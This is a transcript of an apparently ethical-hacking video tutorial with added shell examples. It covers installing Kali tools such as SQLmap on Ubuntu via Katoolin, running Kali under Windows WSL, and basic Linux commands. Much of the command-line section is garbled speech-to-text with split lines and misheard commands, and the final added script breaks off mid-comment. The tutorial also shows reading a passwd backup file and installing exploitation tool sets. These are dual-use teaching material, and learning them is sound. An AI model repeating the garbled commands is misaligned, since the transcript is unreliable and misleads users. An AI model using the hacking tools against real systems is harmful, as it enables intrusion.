Let's go back to VMware Workstation. As you can see, I already have my Ubuntu operating system installed. Installing Ubuntu is very straightforward. So just take a look at the instructions that you need to know when you're installing Ubuntu. Once you've done the installation, it should look something like this. So let me power up my Ubuntu operating system. So as you can see, once you install Ubuntu you land up on this page, and it's asking for the password. You set up this username and password during the installation process. So don't worry about it. Click on Enter.

So let's say you are a Linux lover, you like using the Linux platform. But right now you want to use certain tools for performing application penetration testing and ethical hacking. You just don't need all the tools. You need a few tools. In that case, instead of installing Kali Linux on your operating system, installing only certain Kali Linux tools will be the best option, right? For that, like I said earlier, we'll be using Katoolin. I have a set of four or five commands that you need to use to install Katoolin. First of all, you need to have git on your operating system. Let me check if I have it or not. Anyway, I have these five or four commands which we'll be using. I'm going to attach them in the description below. So if you want, you can use them. As you can see, install git is the first command. It says unable to use it, because I have to log in as the root user. So let me just, it's asking for the password. Yeah, now I'm a root user. So let me try the command again. That's apt-get install git. Yeah, installing git. It's just going to take a few minutes. But while this is happening, let's go ahead and explore Katoolin. Let me go for Firefox here. Let's search for Katoolin. So it's the first link, guys, like I said earlier. So let me scroll down. As we saw, this should be the home page, and we did take a look at the requirements. So let's just go back and see if it's done. It's still happening. So one thing is, make sure you have Python of version 2.7 or above. Otherwise the entire thing won't work at all. Yeah guys, it's done. Now we are done with the first step. We need to install, we need to clone Katoolin, right? So what do you do? Like I said, I have a command right here, just copy this and place it over there, Ctrl+C. Let's go back to the terminal, and let me maximize the screen for you guys. Yeah. And paste. So basically I'm cloning it here, and the next command is, I'm copying the Python file to this directory, and click on Enter. It's just a quick process. Now we'll have to change permissions so that we have access to use Katoolin. For that, basically, we are giving execute permission. So chmod +x. Make sure you take a look at that, +x, and Enter. There we go, now our Katoolin is installed. Say katoolin. So as you can see, it's already there. The first thing that you should do is, before you upgrade your system, it says: please remove all the Kali Linux repositories to avoid any kind of problems.
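The prerequisites just listed (running as root, git, Python 2.7 or above) and Katoolin's warning about leftover Kali repositories can be checked before touching the system. This is an added example, not from the video or the Katoolin project: the sources.list sample and the example.invalid mirror names are constructed, and the sed and grep checks are mine.

```shell
#!/bin/sh
# Added example, not part of the video: pre-flight checks before running
# Katoolin on a non-Kali distribution. It covers the prerequisites the
# instructor lists (Python 2.7 or above, git, running as root) and the
# script's own warning: remove the Kali repositories from apt before you
# upgrade the host system, to avoid the breakage the script warns about.

# Does a "Python X.Y.Z" version string satisfy a minimum major.minor?
# Usage: python_version_ok "Python 2.7.18" 2 7   (returns 0 when it does)
python_version_ok() {
    ver=$(printf '%s\n' "$1" | sed -n 's/^Python \([0-9][0-9]*\)\.\([0-9][0-9]*\).*/\1 \2/p')
    [ -n "$ver" ] || return 1            # not a Python version string at all
    major=${ver% *}
    minor=${ver#* }
    if [ "$major" -gt "$2" ]; then return 0; fi
    [ "$major" -eq "$2" ] && [ "$minor" -ge "$3" ]
}

# Print the active (non-commented) Kali repository lines in an apt sources file.
kali_repo_lines() {
    grep -E '^[[:space:]]*deb(-src)?[[:space:]].*kali' "$1"
}

# Number of active Kali entries; 0 means it is safe to apt-get upgrade.
count_kali_repos() {
    n=$(kali_repo_lines "$1" | grep -c .) || true   # grep -c prints 0 on no match
    printf '%s\n' "$n"
}

# Constructed sources.list sample: an Ubuntu mirror, one live Kali entry
# left behind by Katoolin, and one commented-out Kali entry (harmless).
write_sample_sources() {
    f=$(mktemp)
    cat > "$f" <<'EOF'
deb http://archive.example.invalid/ubuntu bionic main
deb-src http://archive.example.invalid/ubuntu bionic main
deb http://kali.example.invalid/kali kali-rolling main contrib non-free
# deb http://kali.example.invalid/kali kali-rolling main
EOF
    printf '%s\n' "$f"
}

# Live check of the machine you are actually on; returns non-zero on any failure.
preflight() {
    rc=0
    [ "$(id -u)" -eq 0 ] || { echo "run as root (sudo -i)"; rc=1; }
    command -v git >/dev/null 2>&1 || { echo "git missing: apt-get install git"; rc=1; }
    pv=$(python --version 2>&1) || pv="python not found"   # Python 2 prints to stderr
    python_version_ok "$pv" 2 7 || { echo "need Python >= 2.7, got: $pv"; rc=1; }
    if [ -r /etc/apt/sources.list ]; then
        k=$(count_kali_repos /etc/apt/sources.list)
        [ "$k" -eq 0 ] || { echo "$k Kali repo line(s) still active; remove before upgrading"; rc=1; }
    fi
    return $rc
}

# Demo on the constructed sample (safe to run anywhere, no root needed).
sample=$(write_sample_sources)
echo "Kali entries in sample: $(count_kali_repos "$sample")"
kali_repo_lines "$sample" || true
rm -f "$sample"
if [ "${1:-}" = "--live" ]; then preflight; fi
```

Run it with `--live` as root to check the real machine; without the flag it only exercises the constructed sample.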

So as you can see, it shows you like five options here. The first one is add Kali repositories and update, next view categories. Like I said, Kali Linux has 600 plus tools, right? So you have different tools categorized under different headings. Then you have classic menu indicator. It's nothing, here, as you can see, I have a small icon here. If you click on that, it'll just show you different menus. That's all. And if you want to install the Kali menu for easy access, you can do that as well. So let me just click one. Under one, it says add Kali Linux repositories, update, remove, and view all contents. So let's try removing them. Let's try with adding repositories. It says there are certain duplicate signatures, removed and all that. So let's just try to remove, like they suggested earlier. They have been deleted now. One. So if you guys want to go ahead and update the repositories, the already existing ones, you can go ahead and do that. I'm not doing it now because it's going to take a while. So if you want to go back, just click back. It's as easy as that.

Now, let's say I want to view categories and install one tool. As you can see, there are a number of categories here. So I have web application penetration tools here, I have password attacks, I have exploitation tools. Well, if you are interested, there's an introduction video on what is Kali Linux in the cyber security playlist. So go ahead and take a look at that. We have explained about five to six popular tools in Kali Linux. Anyway, getting back to today's session. Let me just select web applications. As you can see, it lists all the web application tools. So if I want to install all those, there's an option, that's zero, but let's just say I want to install a tool called SQLmap. I'm sure you might have heard of SQLmap. If not, it's okay. It's a tool which you use for checking out vulnerabilities present in an application's database system. So anyway, it asks you to enter the number of the tool that you want to install. Let's say 27. So as you can see, it's installing. So it's as easy as that, guys. Once it's done installing, I'll get back to you.

Anyway, I just showed you how to install SQLmap, which is there in web application tools. You can go ahead and do that for other different types of tools as well. Suppose you want to install all the tools, you can go for 0, as in choose the zero option. So there you go, guys. I just showed you how to install one tool, so you can go ahead and do that for any kind of tool under any category. So if you just want to go back, click back, and go for other types of tools. Let's say 8. There you can see, so whatever different types of exploitation tools you want, you can go ahead and install them. Let me just click back, and back. Sometimes when you try to install all the tools, you might get an error saying that the file doesn't exist or the repository doesn't exist. All you have to do is go for one, the first option here. As you can see, here you have option two, which is update. So update your repositories. Make sure the Kali Linux mirror which is present for the update is the right one. Once you've done that, you won't get any errors. All the tools will be installed properly. So suppose you want to get back from this Katoolin, it's easy, just press Ctrl+C. And yeah, as you can see, it says goodbye. So that's as easy as it is to use Kali Linux tools on any kind of Linux distribution. While I've shown you on Ubuntu, the procedure is the same on any other Linux distribution, guys.

So there we go, guys. I'm done with three things. First, we did on Windows using VMware, then on Mac using VirtualBox, and third, I showed you how to install Kali Linux tools on any kind of Linux distribution. And finally, there's one last demo here. We'll see how to install Kali Linux on the Windows operating system using the Windows Subsystem for Linux feature. So, let me get back to my operating system. We won't be needing VMware Workstation anymore.
So guys, we'll be using a feature called Windows Subsystem for Linux, which is by default present in all the current versions of Windows 10. This is actually for those who prefer using the Kali Linux command line interface. So make sure to listen to me properly. Use this option only if you are a pro in using the command line interface, or if you have any experience using the command line interface. Otherwise, just go ahead and use VMware or VirtualBox and install Kali Linux with the graphical user interface option. So yeah, this Windows Subsystem for Linux allows you to run Linux distributions as a subsystem on your Windows operating system. This is really a new feature. It exists only in Windows 10. So you need to use the latest version of Windows 10 to perform this demo or use this option. And in addition to that, we also have other prerequisites. Especially, we need to have git installed, or you can go ahead and download the Windows Subsystem for Linux files as a zip normally, but having git is also nice. Secondly, you need to have Python of version 3 or above. Make sure you've installed Python and set up the path. To check if your Python is installed properly or not, just go via the command prompt and type python --version. It should show you the version properly; only then you can be sure that your Python is properly installed. As you can see, for me it's showing 3.6.7, which is definitely above three, and it's properly installed and the path is set.

The first thing you need to do is enable WSL, or Windows Subsystem for Linux. Just go for the Control Panel, and there click on Programs and Turn Windows features on or off. Make sure not to touch any other features. It might mess up your operating system. So scroll down. It's usually at the bottom. By default it's not enabled; if you're using it for the first time, you need to enable it. So the first thing you do is enable it. As you can see here, it says Windows Subsystem for Linux. Make sure you enable it, check mark it, and click on OK. Once you have done that, run your command prompt or terminal as an administrator. All you have to do is right-click on it and click on Run as administrator. And yes, now we'll be enabling the base distribution. That is, like I said, Windows Subsystem for Linux allows you to run a Linux distribution as a subsystem, right? But for that we need to enable this base distribution. For that, you need to install the base distribution, or any kind of Linux distribution that you need. So just use lxrun /install. So once you type that, this is the output which you get. It says it's the legacy Windows Subsystem for Linux distribution. So you can go ahead and install other Linux distributions which are available in the Microsoft Store. But unfortunately Kali Linux is not available, but it doesn't matter, right? We're anyway installing it using this procedure. Just click on Y here, saying yes. I've already installed it, so it's showing the legacy Windows Subsystem for Linux distribution is already installed on my system. For you, it might take a while. After installing, the most important thing is, it asks you to set up a password and username. Don't skip that step. Wait for a while and make sure you set up the password and username properly; only then the entire thing will work out. Once you've done that, we are done here. You can close the command prompt.

The next thing you need to do is install git. I already have it installed. It's very easy: install the .exe file and click through the installation process. It's very straightforward. And open Git Bash. Yeah, before that, let me go ahead and create a folder called test here. And as you can see, it's stored on my desktop. Right now, it's empty. Anyway, let me go back to git here and cd Desktop/test. Earlier we enabled Windows Subsystem for Linux, but now we have to download the script, right? For that, search for Windows Subsystem for Linux distribution switcher. And the first link is the GitHub link; click on that. There you go, guys. It says Windows Subsystem for Linux distributions, which, as it says, the purpose is to let you easily download and install Linux distributions as a subsystem on your Windows operating system. So as you can see, you have different options here for the base operating systems. So yeah, copy this link here, Ctrl+C, and go back to git: git clone and paste the link which you just copied. Paste it. It shouldn't take very long. It's done, guys. So now if you check your test folder, Windows Subsystem for Linux will be downloaded properly. Let's just go back and check that. Here is our test folder. As you can see, Windows Subsystem for Linux is already there.

Now open your command prompt. cd, let's go for the test folder. And if you search for the directories under that, you can see WSL here. Now, let's go for that as well. You can just press tab. Directories under that, so as you can see, the two things, the most important things, are this get-prebuilt.py and install.py. This get-prebuilt.py will fetch the Kali Linux Docker files, and install.py will install Kali Linux for you. I already have it installed. But I'll just show you how to do it. So go back to the browser and search for the Docker file. Click on the second link. I just wanted you to copy the command easily so that you won't make mistakes. This is the one which you'll have to copy to fetch the Kali Linux Docker files. So you can just copy this part and go for the command prompt. Let me maximize this for you. Here you can see, so if you remember I said Python is a must. So make sure you install it properly and set up the path, right. And get-prebuilt.py, let me just type it and copy it. As you can see, it's installing. It's going to take probably like 2 minutes. So it says it's done, and it says it saved this file in the test folder. Let's go back and check if that's happened. Here's the test folder; under WSL you have Python, as you can see, you have a Python folder. It's the folder of Kali Linux fetched; you'll have to install it now, right? So let me now just type python. This is the command that you want to use, that's install.py, and copy this or just type it and press tab, let it autocomplete, and click Enter. So as you can see, it took a while, but it did install. Right now, all you have to do is, it's installed, so you can close the CMD and open your command prompt and run it as an administrator. Click Yes. Let me maximize the screen. You'll have to set the default user as root, so lxrun /setdefaultuser root is the command that you need to use to set the default user as root. As you can see, it's now set to root, and type bash. Done guys, right now we are running on the Kali operating system on the command line interface. If you want to make sure if you're actually running on Kali, just type cat /etc/issue. It shows that it's Kali Linux rolling. So as you can see, we have successfully installed the Kali Linux command line interface, or how to use the command line interface on Windows using Windows Subsystem for Linux. And I'm telling it to you again: just use it if you know how to use the command line interface very properly. Otherwise it might be a little overwhelming for beginners.

So now it's time that we go through the command line basics of any Linux terminal. Now, the Linux terminal is a very powerful tool. It allows you to move around the whole operating system through the files and folders. It allows you to create files, change their permissions, change how they behave, and a bunch of other things. You can do filtering, you can grab specific stuff from a specific file, and there's a bunch of interesting things that you can do. And as an ethical hacker, you will be working with a Linux distribution most of the time, whether it may be Kali Linux or some other thing like Parrot OS, but you will be working on Linux most of the time, because it's a powerful tool for networking analysis and scanning and all sorts of stuff that you want to do as an ethical hacker. So the first essential step is to actually know how to use the tool that is available to you, and that is out here, which is the terminal. Now, as I'm running this on a virtual machine, you might find that my execution times are much slower, and that is because I have a very, very slow laptop, because my virtual machine is actually eating up a lot of my RAM and I have a bunch of other processes that are also rendering; I do this in my free time.

So let's go ahead and go through the commands that we are going to actually go through now. Let me actually make a list of commands that I want to teach you guys. So let me see if leafpad is available. Firstly, leafpad is basically a text editor. So the first command that we're going to start off with is cd. cd stands for change directory. Now at this moment, we are in the root directory. As you guys can see, we can print the current working directory with the simple pwd, and that is our current working directory; as you see, it's called root. And suppose we want to change directory to the home directory. So all you have to do is cd, which stands for change directory, as I just said, and specify the path. So cd /home. Okay. So once we're in home, I want to make a list of commands that are used on the CLI that I want to teach you guys. So what would I do? I would firstly see if any files are available that I can edit. Okay, so these files are available, but let's create a new file for ourselves. So firstly, let's do nano list.txt. Now, what nano does is, nano will open up a small command line text editor. Now, command line text editors are very much used by ethical hackers because they save a bunch of time. If you're always switching between GUI and command line, because you'll be doing a bunch of stuff on the command line, and when you want to write something you're always switching to GUI, it's a waste of time, and you want to be efficient as an ethical hacker. So you can use this thing called a command line editor, and it can basically do most of the stuff a GUI editor would do. Now you say nano and the name of this file. So now basically nano has created this file, and it has opened up this new fresh window, which overrides the command line that we were in, the Bash, and this is a place where you can actually edit what goes in the file.

Now, let's see the list of commands that I'm going to teach you. I'm going to teach you ls; ls will be the list of files. We did cd. We saw pwd, so that was print working directory. We'll be looking at how you can copy stuff with the cp command. Then we will be looking at mv, which is basically move. Then we will be looking at cat, and that's an interesting one, and also less, which is another interesting thing. And we'll be looking at grep, which is actually used for grepping or grabbing things from files that you might want to see; you'll see what I mean in a short while. We will see echo, which probably does what you think if you have any experience with Linux. Then we'll be doing touch, and we'll be doing mkdir, which is make directory, and then we'll do chown, chmod, then the most dangerous command, that is rm, and then you can do man and help. Okay.

So these are
the list of commands

that we are going to go through

in this As part of the video so


suppose I was making this video

and I want to
save the somewhere.

So you see down here.

There are a bunch of options


that are sure to you.

Now this cat it sign


might be not really thinking

that the shift 6


1 it's not shift 6:00.

It's actually a controlled


so cat it is controlled

and then G of course means G.

So if you go Control G,
it will actually get help.

Now.

What we want to do
is save the file

and that is control.

Oh and that is right out.

So what we want
to Who is a control?

Oh, and now it's going to say

if we want to name
the file list at the XD

and we want to name


the file and it says

that we have written


down 15 lines.

So that's how you save a file.

Now.

All you want to do


is exit out of you.

Okay.

So first let's go LS and let's


go through whatever there is.

So LS showed us the list


of files that are there

in that directory.

Now Alice can also


show you the list

of files in a directory.

Curry with the paths

that you specify


likewise ALS VAR.

It'll show me everything


that is involved.

Okay, there are a lot


of interesting things like bar.

So let's head over twice CD /


bar and you hit enter

and now we are


in the folder bar.

So now to actually demonstrate

how powerful analysis we have


a few Flags now to see the flags

of any command you


can just do - -

help universally throughout


the Unix one line so out here

you see some information

that is Stuff to read


but if you go on top

and scroll out here,

you'll see all the flags

that you can use


with the command.

That is LS and
how you can use them

so you can see

what you use and you can read


a little bit about it.

So if you use all it ignores


entries starting with DOT,

so suppose we were to do LS

in why let's see so


it shows us like this now

if you do LSL,

it'll show a long list


with more information.

So these are the permissions


Options that you see out here

we will be seeing

how we can change

the permissions of a file


soon enough and this is
who owns the file the user

and the user group


is the file number.

I guess.

I'm not sure which is

when the created the name


of the file is the time

when the file was


created, I guess.

Okay.

So that's how you get


very detailed information

about all the files now.

That's another thing you


might want to use with ALS

and that is the 8X


so you can go LS

a and it will show you all.

Of the hidden files also.

So now you see some two files


that were not shown out here.

Our file is begins from backup.

But when we do LS, / I mean -

La we see two more files


at this Dot and Dot so let's see

if we can move into that CD dot


so we can't even move into that.

So that's interesting.

So these are hidden files.

So these are not seen


two random users

and we can actually


do stuff with them.

We will see how we


can use hidden.

Hours later on.


So if you want to show
hidden files through LSU,

all you have to do is LS and -


La so that was all about LS.

So let's move back to /home


where our list of commands

that I want to show you


always so silly home.

Let's Alas and see


what was it called,

its called list and suppose.

I want to see the condensed


of list or txt.

All I have to do
is say list dot txt.

Now.

It shows us whatever
this file is containing.

It will read it out for you.

Done CD we've done LS

and its various forms

we've done PWD now it's time


to do CP CP is basically used

for copying files from one place


to another so suppose.

I want to copy this address file

that is there into


some other directory.

Let's save our so all I would


have to do is CP name Dot txt.

And then you specify


which location you want

to actually copy it
to so CD / VAR.

So this is where I want to copy


my file to and you hit enter

and it's Copied but


that was a very small file now.

We can actually check


if it was copied

before I move on and pour


some more knowledge into you.

So let's go into VAR.

So CD / VAR hit enter


and you're involved again

and you CLS and now


you see a name dot txt.

So let's remove
name dot exe from here

because I want to copy


it again and show y'all

a difference between a flag


that I'm going to use right now.

So the -

and letters that you


use are called flag.

Technically in the
Linux terminal RG.

So let's go back to home now


instead of the name of the file

and moving back home.

Just like I did you can type

out the complete name


of the file out here.

So you could have gone


CD slash home slash name

Dot txt and copy to slash bar.

But this time

what we're going to do is


we're going to use a hyphen V,

which is basically used

for a verbose output


of whatever you're doing.

So most of the commands


that we're going
to using will have a -

V with them.

So, let's see how this


actually affects the output.

So what we're going to do


is we want to copy so sleepy

and verbose and we want


to copy the file name Dot txt.

And we want to copy it


to the folder called VAR, right?

So now you'll see

that it will give us


what is being moved rather

that is named Dot txt.

And where it is being moved


to so this is a very good way

of knowing what is
actually happening because

if you do it without the verbose


And suppose name not the XD was

just 20 GB file
and you just don't know

if it has finished or not.

So if it's a 20 GB file

that is continuously update you


on where what is being copied.

So basically all you


have to do is type -

V if you want to know

where your files being copied


and the exact part.

Okay, so that was about


how you can copy files

from here and there now,

what was the next command


that we want to see so cat.
So, let me just go and see
the next command

that is there so list at the XT

so after God I want


to show less Okay.

So we've done CP we
also have to do MV.

Now as you guys can see, cp is basically a copy. Copy, as you would expect, leaves a copy of the file in the original directory while also placing a copy in the directory that you specified. But if you want to move the file completely, all you would have to do is use the command mv. So mv is for moving the file.

Now, let's see what all goes with mv, so you can type mv --help, and as I said you get the verbose option, and you get suffixes, and you can force things to happen. Suppose you don't have the permission: do not prompt before overwriting. So it'll give you a prompt, and you can completely overlook the prompt with the -f thing. Let me just show you how that looks like. We'll be doing a verbose and we will be moving the address.txt file, and okay.

So every time I've been actually typing, but you can do address.txt by just pressing Tab and it will autocomplete. So mv -v address.txt /var. Now it will show you that it has actually renamed 'address.txt' to '/var/address.txt'. Now, if you go and do ls out here, you will see that address.txt is not actually here. But if we were to move to /var, so cd /var, okay.

I've also been typing out commands that I have been previously using, and you can simply toggle through all the commands that you've used with the up and down keys. So ls, mv, mv --help, I did cd home, and I have to go through all this just to prove a point. So cd /var. We want to change to that now. We're in the var folder, and we also want to see what we have out here. So address should be out here, and ls, and as you guys can see address.txt is the first file that has come up, and it is basically the same file, and I can prove that to you by just catting the file, so cat address.txt, and you see that it's some random address for some random person.
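Here is the copy-versus-move comparison from above as a script, an added example that is not from the video: it builds a throwaway home and var directory with mktemp, runs cp -v and mv -v, and reports which of the two files exist where afterwards. The file names and their contents are made up for the demo, and nothing outside the temporary directory is touched.

```shell
#!/bin/sh
# Added example (not from the video): copy versus move, both with -v, inside a
# throwaway directory made by mktemp so nothing on the real system is touched.
# File names and contents are constructed for the demo.

demo_cp_mv() {
    work=$(mktemp -d) || return 1
    mkdir "$work/home" "$work/var"
    printf 'Aarya\n' > "$work/home/name.txt"                # constructed content
    printf 'some random address\n' > "$work/home/address.txt"

    # cp -v reports each file as it is copied; the source stays in place.
    cp -v "$work/home/name.txt" "$work/var/" > "$work/cp.log"
    # mv -v reports the rename; afterwards the source no longer exists.
    mv -v "$work/home/address.txt" "$work/var/" > "$work/mv.log"

    # Build a one-line status of what exists where after both operations.
    status=""
    for f in home/name.txt var/name.txt home/address.txt var/address.txt; do
        if [ -f "$work/$f" ]; then status="$status${status:+ }$f"; fi
    done
    # The verbose log names the file being copied, which is how you would see
    # progress on a 20 GB copy that would otherwise sit there silently.
    if grep -q 'name.txt' "$work/cp.log"; then status="$status cp-verbose-ok"; fi
    rm -rf "$work"
    printf '%s\n' "$status"
}

# Usage when run directly: prints the status line.
demo_cp_mv
```

The status line shows name.txt in both places (cp keeps the original) but address.txt only under var (mv does not), and the last token confirms that -v named the file it was copying.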

Okay now, let's quickly clear out our terminal window. You can do that with Ctrl+L, or you can just type clear. Now, what we want to do is move back to home. So yeah, cd home. Okay. So now that we're back at home again, let's cat our next file. So cat list.txt, and after move I wanted to go through cat. Now cat, as you guys can see, is printing out the contents of a file, and there's also less, which does something very similar to cat. So, let's see what it does.

So if you go less list.txt, you actually see the contents of the file in a completely new window, which overlays on the previous window, and this is a very neat way to actually see the contents of a file, which is through less, if you want to keep your main command line interface not so cluttered, which cat clutters completely. So if you want to get out of this place, this less place, all you have to do is press q, and q gets you back, and as you see nothing was printed out on our main interface. So this is a very cool way to actually keep your command line interface neat and tidy when you're doing work.

Okay, so grep. So grep is used for actually filtering out stuff from a file. So suppose we want to see whether a command has some verbose option to it or not. So now I know that mv has a verbose option, but suppose I didn't know that, so mv --help, then you use the pipe sign. So what the pipe means is you have to take this command, the first command, and then you pipe it into the second command, and you want to see grep -v, if that exists. Okay, so let's see, grep for verbose. Yep. So a verbose exists, and that is -v, and that's --verbose, explain what is being done.

So what happened out here is basically we took this first command and then we filtered it, and filtering is done through the piping. So basically think about you taking some input and pipelining it through something else, which funnels it out of this command, which is grep. So you can use mv --help in conjunction with a bunch of other commands, and I'll leave the creativity up to you. So grep is basically used for getting what you want from a file, and grep is used very, very much throughout the course of this video, through this Kali Linux tutorial that you're going to be watching.

So that is a very easy way to see if you have a particular option. Let me do it again also, so cd /var. Now we're in the var folder, and let's ls. We actually have name.txt. Now, let's also go into backups, so cd b and Tab, and that brings us the backups folder, and we're now in the backups folder. Let's do an ls out here. Okay, so we have a bunch of files. Okay. We have some passwd.bak. Now see, if you have cat and you go cat passwd.bak, you can see the entire thing. Now what if you didn't want the entirety of it, or if you want something in particular, you want to be very neat, so you can do that same command, you can pipeline it, and you can say grep, and you want everything with nologin. So we can see that there's a bunch of things that say nologin, and we only want those, and these are all the things that say nologin in them, and it's a much smaller list, and it gives us the very particular list that you are looking for. So that is how you use grep.
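The pipe-into-grep pattern from the passwd.bak demo, as an added example that is not from the video: the passwd-style lines are constructed to imitate the format of /var/backups/passwd.bak (they are not a real file), and the functions filter them the same way "cat passwd.bak | grep nologin" does. It also shows the inverse filter, grep -v, which is the question a defender more often asks: which accounts can actually log in?

```shell
#!/bin/sh
# Added example (not from the video): filtering command output through a pipe
# into grep. The passwd-style lines below are constructed for the demo.

sample_passwd() {
    cat <<'EOF'
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
aarya:x:1000:1000:Aarya:/home/aarya:/bin/bash
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
EOF
}

# Accounts whose shell is nologin: the pipe feeds cat's output into grep,
# which keeps only matching lines; cut then keeps just the user name.
nologin_accounts() {
    sample_passwd | grep nologin | cut -d: -f1
}

# The inverse filter (grep -v = invert match): accounts that CAN log in,
# which is the list worth reviewing on a system you are responsible for.
login_accounts() {
    sample_passwd | grep -v nologin | cut -d: -f1
}

# Checking whether a command supports an option, as in "mv --help | grep -- -v".
# The "--" tells grep that the following "-v" is the pattern, not grep's own option.
option_supported() {
    # $1 = command, $2 = option text to look for
    "$1" --help 2>&1 | grep -q -- "$2"
}

nologin_accounts          # daemon bin sys www-data
login_accounts            # root aarya
```

Note the "--" in option_supported: without it, grep would read -v as its own invert flag, which is the most common mistake when searching help text for a dash-prefixed word.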

So now let's head back to home. Okay, I've done it wrong. And again, let's see what the next command is, so now let's cat list.txt. So we've done grep. We now have to do echo, echo and then touch. Okay, let's go back a few, we press q and we get out of there. So what did I have to teach again? I'm such a dummy, we have to do echo. Okay.

So what is echo used for? So suppose you were to say echo and, in quotes, hello world. It would basically do what the man page says, that is, echo whatever you say. Now, it'll say echo hello world, and that will basically echo whatever you typed out in the quotations. That is "Hello World", spelled very wrong. Okay, now suppose you want to actually put this into a file, so you could do echo hello world, let's spell it properly this time, and you want to enter it into the file. We had a phone number file I guess, phone number.txt. Yep, and we can echo it into that file with >. Now that was done, now let's see. Cat phone number.txt... phone.txt, and it says hello world. So you can basically input text into a certain file with the echo command, and that's how you do it. Okay.

Now let's also see how you can make directories, and that is with the make directory command, mkdir. So, okay. We also have to do touch before that, I forgot. Now touch is used for quickly creating files, so touch, you could say touch and then the file name, so we can create a name file again, name.txt, and that will create a name.txt. Let me just show it to you, and ls, and we have a name.txt. We can also create multiple files with touch, and you could say file1 file2 and file3, so like this you can create multiple files, and let me just ls that out and show it to you, and ls, and we have file1, file2 and file3. Now we can also create a directory. So mkdir and the name of the directory. So suppose you wanted to save all your movies in one directory, then mkdir movies, and now you have a directory called movies, and you can also move into movies. So cd movies. Okay, so that's how you create directories, and you can move into them with the change directory command, cd.

Now, let's see what the next command was. So cd and dot dot, so with cd .. you can move back to the previous folder. I've already told you that, and since we're in movies we can just go back to home with cd .. now.

Let's see what else is there, so cat list.txt. And okay, now chown, chmod. Now chown will be a little tough to show, because we don't have any sort of other user out here. The root user is the only user that we have on this VirtualBox setup, but if you want to change the ownership of a file, so let's see. So you can see the ownership of a file through the ls -l command, and you see that root and root. So this is the owner name, and this is the owner group, and they're mostly the same thing.

So our next command that you're going to actually see is called chown. So let's see how chown is actually used. chown is used for changing the ownership of a file. So I actually don't remember how to use chown. So if you actually don't remember or you're getting stuck somewhere, just use the help function. So if a command line argument is symbolic, so let me just go through this one. So this is how you use it: owner, and then colon, group. Okay, and then the file name. So you go chown and then you want to say the name of the owner and the group you want it to belong to, that is root and root, and then you specify the name of the file. So suppose I want to change file1, that already belongs to root and root, so it doesn't really matter, because I don't have any other username to actually change the ownership to, so this is how you would normally change ownership. So let me just show you where you can see the ownership, and that is ls -l, and I'll show the root and root you see on file1, basically this is the owner, this is the owner group. They're normally the same thing and the same name, but if you had some different owner like a guest, you could change it by actually using the chown method, the command... methods are different things. I always get confused because of the programming. Okay.

Now the next command that is left is called chmod. To actually show you how chmod works, let me show you an interesting file. So suppose, let me just do this once, okay, now echo, what do you want to echo? Let's echo hello world, and let's put that in quotation. And we want to put this in test. Now once we've done that, let's ls, and we see that we have a test file out here, and we want to move test to test.sh, so test.sh is the executable file that is used in bash scripting. So we move test to test.sh. The way you actually execute bash files on your command line is with ./, so you say dot slash, and if I press t and I press Tab, you see that there are no options coming up. That is because test.sh is not an executable file; test.sh doesn't have the executable permission. So let me just show that to you, ls -l, and you see test.sh, it doesn't have the executable. Now you see movies, it is executable. I don't know why, it is a directory. So it is an executable, you can move into it. So it's blue in color.

So the way you actually can make this an executable is by changing its permission. So the way you do that is chmod, and basically you change it to an executable. So +x, that is making an executable. If you do +r it'll make it readable. And if you do +w it will make it writable also. So if you do +x and test.sh, and now you go and do ls -l, you'll see that test.sh has become green because it is an executable file now, and now if you do ./ and you press t, you get test.sh if I press Tab, so now it is an executable file. And if I execute it, it prints out hello world onto my screen. So that's how you can use chmod, which is basically the change of permissions of files, and we'll be changing permissions of files throughout the course of this video. It will be very useful for us, and you'll see as we go along with this video.
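The chmod +x walk-through as a script, an added example that is not from the video: it writes a small script file, checks that it is not executable yet (the state in which ./test.sh is refused), adds the execute bit and runs it. I assume the script body is an echo command with a shebang line, which is what makes the run print hello world; everything happens in a temporary directory created with mktemp.

```shell
#!/bin/sh
# Added example (not from the video): turning a text file into a runnable
# script with chmod +x. Runs in a fresh temporary directory; "test.sh" is the
# name used on the page, the script body is an assumption for the demo.

demo_chmod() {
    work=$(mktemp -d) || return 1
    # Same steps as on the page: put the content into "test", rename it to .sh.
    printf '#!/bin/sh\necho hello world\n' > "$work/test"
    mv "$work/test" "$work/test.sh"

    # A plain file has no execute bit: "./test.sh" would be refused.
    if [ -x "$work/test.sh" ]; then before=executable; else before=not-executable; fi

    chmod +x "$work/test.sh"      # +x adds execute; +r and +w add read and write
    if [ -x "$work/test.sh" ]; then after=executable; else after=not-executable; fi

    # Now it runs directly, exactly like "./test.sh" from inside the directory.
    output=$("$work/test.sh")
    rm -rf "$work"
    printf '%s %s %s\n' "$before" "$after" "$output"
}

demo_chmod     # not-executable executable hello world
```

Note that the test -x check is the same thing the shell's Tab completion uses when it decides whether ./t can complete to a runnable file, and it is what ls -l shows as the x in the permission string.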

Okay. So the next thing that I want to show you, only two are left and I remember those now, and it is rm. rm is used for actually removing files, so you should be very careful while using rm or any sort of removing command on a Linux system, because once you remove something it is very difficult to get it back, it's almost impossible. It's not like Windows, where it basically just disappears in front of your eyes but it's still there in the memory cluttering it all up. That's why Linux always trumps Windows. That's one of the reasons, and I'll make a video on that later on. But for now, let's focus on rm.

Now, we can remove file1. So, let's see, so file1 is going to be removed. So if we ls now, you see it's gone. But let me show you rm, and if I do rm movies it'll say cannot remove 'movies': Is a directory. But if you go into the help menu, I bet there will be an option that you can just forcefully remove it. So rm force will just remove, so rm -r, and you can do movies, and it will recursively remove everything, and if you go ahead and do ls -l you'll see that there is no movies directory anymore. And that is how you can remove movies. Now, that prompt that you saw out there is actually a safety measure, because once you remove a directory it's not retrievable, and that's a very sad scenario, and you don't want to get yourself in such a scenario in whatsoever possibility.

Okay, moving on, so on and so forth, that was all about the rm command. Now you can do rm and the address of anything. So rm, I know we moved address.txt into the /var folder, so we can go rm /var/address.txt, and that will remove address.txt from the /var folder. Let me just show you that it worked. So cd /var and ls, and you see that there is no address.txt out here.
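One script, an added example that is not from the video, serving both the file-creation passage (touch, mkdir, echo with >) and the rm passage above: it creates the same kind of files and directory in a temporary directory, shows that echo with >> appends where > overwrites (one step beyond what the video shows), then removes a file, captures rm refusing the directory, and finishes with rm -r. Names are constructed for the demo.

```shell
#!/bin/sh
# Added example (not from the video): creating files and directories, then
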